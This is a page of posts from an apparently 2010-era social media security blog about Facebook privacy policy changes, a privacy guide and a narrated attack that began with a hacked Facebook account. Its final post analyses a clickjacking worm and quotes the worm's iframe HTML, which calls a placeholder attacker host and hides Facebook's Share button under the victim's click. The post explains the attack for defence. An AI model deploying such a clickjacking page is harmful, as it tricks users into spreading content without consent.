Users Bamboozled and Policies Eroded – Is Facebook still the valuable tool you thought it was?

Geek level: Very Low. Editorial observations and deep, introspective questions…

I just wanted to give props to some folks who are really getting the impact of the changes to  Facebook privacy policies and settings, and trying to get the message across in different ways.

Facebook privacy settings are getting so complicated, few people seem to know the implications. And as a result, most don’t bother changing them. For those of you who remember what it was like to try to program a VCR back in the 1980’s and 90’s, what goes around comes around. The comparison is scary, as tweeted by Robert Nunez and Tom Watson – “Facebook privacy settings are the new programming your VCR”

(See http://www.preoccupations.org/2010/05/facebook-2010.html )

I heard about this observation while listening to This Week in Google (at http://www.twit.tv), when Jeff Jarvis mentioned it. Leo Laporte then added, “It’s like we’re all on flashing 12:00’s”  (If you don’t remember, it’s sort of like having a digital clock that loses power and forgets what time it is.) For the old VCRs, you had to go in and reset the time, then you had to set the channels and times you want to record. It was so complicated, many people just left them with the flashing 12:00’s. I can relate to that, along with many others I’ve heard from, regarding Facebook’s increasingly convoluted privacy settings.

Facebook just seems to want people to give up on protecting their privacy. To paraphrase Jarvis, it seems strange that instead of leveraging the trust of its 400 million users, and taking the opportunity to establish itself as the “protectors” of our identities on the Net, Facebook is carelessly exploiting that trust to its fullest extent for short term profit. Too bad for them, and for all of us.

Also in that same episode of TWIG, Jeff Jarvis referred to the Electronic Freedom Foundation’s (EFF) timeline of Facebook privacy policies over the years. It’s interesting to see how convoluted it’s become since their first privacy statement in 2005, which read:

No personal information that you submit to Thefacebook will be available to any user of the Web Site who does not belong to at least one of the groups specified by you in your privacy settings.

(from http://www.eff.org/deeplinks/2010/04/facebook-timeline )

Now, as of April 2010, the policy reads…

When you connect with an application or website it will have access to General Information about you. The term General Information includes your and your friends’ names, profile pictures, gender, user IDs, connections and any content shared using the Everyone privacy setting. … The default privacy setting for certain types of information you post on Facebook is set to “everyone.” … Because it takes two to connect, your privacy settings only control who can see the connection on your profile page. If you are uncomfortable with the connection being publicly available, you should consider removing (or not making) the connection.

So, did you know this? Or have you quit Facebook – for good, or in protest – due to these moves? Or will it take one more move toward the cliff?

Not surprisingly, I don’t use Facebook for anything very personal. The stuff I put there is all pretty boring, say my friends. But if you joined a long time ago and have a significant amount of personal information in Facebook, you might want to read today’s Facebook privacy policies and consider how likely it is that what you thought was protected (by the default settings at the time you joined) may inevitably become public at some point.

Today’s trending topics might as well be “Facebook privacy settings changed” and “Facebook privacy policies changed“. So, if you still feel that privacy represents a fundamental personal value, we’d all like to know, “What value does Facebook continue to bring you as a tool, and is it worth the cost?”

Facebook Privacy & Security Guide Updated to v2.1

The Facebook Privacy & Security Guide has been updated to version 2.1 to reflect recent changes that Facebook has made.  Updates to the guide include minor changes to the privacy navigation structure and details on the new “Instant Personalization” privacy setting.  Also, I included information on Facebook Ads.  Please print it out for your own use or share with friends and family!  Questions and comments can be posted here or sent to feedback[aT]socialmediasecurity.com.

Download the updated version of the Facebook Privacy & Security Guide

Facebooks Proposed Privacy Changes: What You Need to Know

I won’t put together a long post about the recently proposed Facebook Privacy Policy/Statement of Rights and Responsibilities changes.  There are already some very good analysis on the subject.  However, below are links to some of the best blog posts and research to check out.  Note that the comment period ends on April 3, 2010 at 12am PDT.  Make your comments on the Facebook Site Governance document page here.

Links to the proposed changes
Facebook Privacy Policy and Statement of Rights and Responsibilities Updates

Detailed Analysis Worth Reading
Facebook Proposes Broad Updates To Governing Docs — Our Analysis (from Inside Facebook)
How Facebook is Adding an Identity Layer to the Internet (from theharmonyguy)
Yet Again, Facebook Misunderstands Privacy (from MichaelZimmer.org)
Facebook Again to Test Privacy Boundaries (from Fred Stutzman)
Is Facebook Unliking Privacy? (from the ACLU of Northern California)

Also, be sure to check out Social Media Security Podcast Episode 12 which will be released soon!  Scott Wright and I will be talking about these changes with some analysis as well.

Security pros use layered techniques, but so do attackers

For many years security professionals have advocated using layered safeguards to reduce the risk of threats. While many organizations do employ multiple technologies like firewalls, anti-virus and intrusion detection to try to stop hackers, these guys are getting very good at navigating our layers of security. It’s like the old Mario and Donkey Kong video games where you had to jump over land mines, climb ladders, wait for doors to open and avoid swinging obstacles to reach the bonus prizes.

As an example of how many layers they are able to traverse, consider the reported attack on a financial institution’s enterprise network, which started life as a hacked Facebook account. (Click HERE for the full story.)

To make a long story short the attackers did the following:

  1. They captured the Facebook credentials of an individual who worked for a financial institution
  2. They then scanned the user’s Facebook profile to find recent social events involving co-workers on Facebook (finding a company picnic)
  3. They then sent emails to multiple Facebook friends who were co-workers saying, “Hey, have a look at the pictures I took at the company picnic!”
  4. The emails contained links to malicious web pages that attempted to launch a keylogger on the victims’ computers.
  5. They then scanned the keystrokes of an employee whose laptop had become infected with the keylogger and found the authentication credentials for the corporate VPN
  6. They infiltrated the VPN and infected a computer inside the corporate perimeter and performed vulnerability scans around the network to find servers with sensitive information on them.

The attack lasted as long as 2 weeks. If the attackers’ vulnerability scans had not been so “noisy”, they may not have been noticed, and the company could have suffered severe losses in terms of costly data breaches and corrupted databases, as well as system repairs.

So, what will happen now? Will the company add another layer of security to prevent a similar attack in the future? Probably… and these attackers will probably move on to other organizations with a bit less security. The cat and mouse game continues.

What’s interesting in this story is that the initial attack on the employees’ Facebook friends is pretty hard to defend against, since nothing seemed out of the ordinary. There really was a corporate picnic!

What would you do next if you were a security manager at this financial institution?

Facebook Application Privacy Confusion Continues

Many technology journalists and privacy advocates have criticized aspects of Facebook’s new privacy controls and default settings. But I’ve noticed one aspect to the changes that I find disappointing, and thus far I’ve not seen it noted elsewhere.

You may recall that earlier this year, Facebook came under scrutiny by the Privacy Commissioner of Canada. Several concerns the Commissioner’s office raised related to Facebook applications. Readers of this blog were already quite familiar with privacy issues relating to applications, but the Canadian investigation brought them to the forefront, and Facebook responded by promising sweeping changes to their platform.

When the new privacy controls launched on my own Facebook profile, I took a look at the section for “Applications and Websites.” At first, my feelings were mixed. Facebook had finally made it clear that the checkboxes of various fields you could elect to share applied only to applications your friends used. (The previous setup was far more confusing and led to even major technology sites errantly reporting that the controls applied to applications you used as well.) But Facebook had also removed the option to exempt yourself from the Platform completely.

But then I clicked the button to “Learn More” about what I shared when using applications and web sites. I’ve long talked about the need to educate users, so perhaps this would finally clarify how much access applications have. Instead, I was stunned to read this statement:

When you visit a Facebook-enhanced application or website, it may access any information you have made visible to Everyone (Edit Profile Privacy) as well as your publicly available information. This includes your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages. The application will request your permission to access any additional information it needs.

Excuse me?

At first, I thought this was simply false. The way I read it, authorizing an application gave it access to your PAI and anything visible to “Everyone,” but if the application also wanted, say, your favorite movies, it would ask you first. While Facebook has vowed to eventually roll out such a setup, it has not yet appeared and was not promised to be fully in place until fall of next year.

But then I realized what the paragraph was actually communicating. An application has access to your PAI and anything visible to “Everyone” as soon as you stop by – no authorization necessary. (This may lead to a few surprises and scares in the near future.) That last bit about requesting your permission for any additional information refers to authorizing the application. In other words, if the application needs any more data, it will request authorization – which gives it access to all of your personal data.

Some may counter that the confusion here lies with me alone, and I ought not presume that users will make the same mistake. However, given that users have already been trained to authorize applications before using them at all (not to mention whether users even distinguish applications from the Facebook brand), I’m quite certain this new paragraph will continue to produce the sort of myths I’ve seen published about the old application privacy settings. In any event, Facebook has resorted to language that could at best be described as somewhat vague.

Please correct me if you think I’m wrong, but I find the last sentence of Facebook’s new explanation very misleading. It gives the impression that applications will politely ask users for more personal details if they become particularly necessary, when in fact most people who use a given application have already authorized it and thus already given it full access to personal profile information.

After all of the controversies, studies, confusions, misstatements, and problems that have come about this past year regarding privacy and Facebook applications, and especially in light of the previous pressure from Canada, I would have thought that Facebook would take this opportunity to add a more thorough and clear exposition of what applications can access and do with user information. Perhaps I’m being too hard on their new attempt. But if the past is any indication, I expect user misunderstandings over Facebook applications to persist.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Facebook Privacy & Security Guide Video Released

I finally got around to recording and editing the video walkthrough of the Facebook Privacy & Security Guide.

The video clocks in at about 18 minutes.  I also included information about email/text alerts, how applications work, Facebook Ads, and how to hide your friends list from public searches.  Stay tuned for other guides and videos for MySpace, Twitter and LinkedIn.

Want to help with these guides and videos?  Join the volunteer mailing list or send me an email at feedback [At ] socialmediasecurity.com.

Facebook Privacy & Security Guide v2.0: Updated with New Privacy Changes

I have updated and released version 2.0 of the popular Facebook Privacy & Security Guide.  Version 2.0 reflects the recent changes that Facebook made to it’s privacy settings.  In addition, I added a new section titled “Blocking and Creating Friend Lists” and expanded on how your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages are now publicly available information.

Download the new version of the Facebook Privacy & Security Guide here.
You can also get to the guide from: and from the top of Socialmediasecurity.com under “Guides”.

Can you remove public access to your friend list?
One tip I didn’t have room for in the guide around these new changes is the following.  You can remove the ability for your “Friend List” to be viewed in public searches by selecting the Edit “pencil” in the Friends box on your profile page and unchecking the box.  Here is a screen shot of this.  Unfortunately, this control is all or nothing but the good news is your Friends can still see your friends list.  You may also want review your application settings so application “boxes” are not showing on your public profile as well.  More information can be found on Facebook’s blog post about these issues (hat tip to @mubix for pointing this out).

Like before please send any feedback on the guide to feedback[ aT ]socialmediasecurity.com.  The companion video is being worked and should be up shortly as well.

Facebook Worm Uses Clickjacking in the Wild

Reports have been spreading today of a new Facebook worm that posts a link to the infection page on people’s profiles. The infection page itself includes a button that users are told to click, with the promise of seeing “something hot” or dominating FarmVille. Nick FitzGerald at AVG posted a walkthrough of the worm (warning: slightly NSFW image), and when explaining how the worm operated, gave an explanation similar to that of other articles I saw:

A sequence of iframes on the exploit page call a sequence of other pages and scripts, eventually resulting in a form submission to Facebook “as if” the victim had submitted a URL for a wall post and clicked on the “Share” button to confirm the post.

With all due respect to FitzGerald and others, I was suspicious. First, I know from experience what sort of CSRF protections Facebook has put in place. Second, if this were truly just CSRF, why not execute the attack on loading the page instead of requiring a second click?

I do know of one relative of CSRF attacks (some classify it as simply CSRF, but I do see a distinction) that requires another click, and that’s clickjacking. I decided to check out an infection page to see exactly what was going on.

Sure enough, both the “hot” and “dominate FarmVille” pages load in invisible iframe, which calls for another local page, which in turn loads another invisible iframe. The actual source of the second local page looks like this (URI edited):

<html><head></head><body><div style=”overflow: hidden; width: 56px; height: 24px; position: relative;” id=”div”>
<iframe name=”iframe” src=”http://EVILURI/index.php?n=632″ style=”border: 0pt none ; left: -985px; top: -393px; position: absolute; width: 1618px; height: 978px;” scrolling=”no”></iframe></div></body></html>

The address that the iframe loads simply redirects to a Facebook share page with the infection page specified as the share link. Note that the style attribute on the iframe includes negative values for “left” and “top” – this ensures that when the page loads, the “Share” button for the Facebook page is at the top-left corner of the iframe, and thus positioned right underneath the button users think they are clicking.

It’s perhaps worth noting that the possibility of such a worm has been pointed out before, including on this blog:

All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.

I also encouraged Facebook in my Month of Facebook Bugs Report to take clickjacking seriously. The behavior of this worm is only the beginning – as I’ve pointed out for months, a similar attack could authorize a Facebook application (malicious or hijacked) and steal user information while spreading links even more virally. This new worm may be one of the first examples of clickjacking used in the wild, but it certainly won’t be the last.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 2 3 4 5 12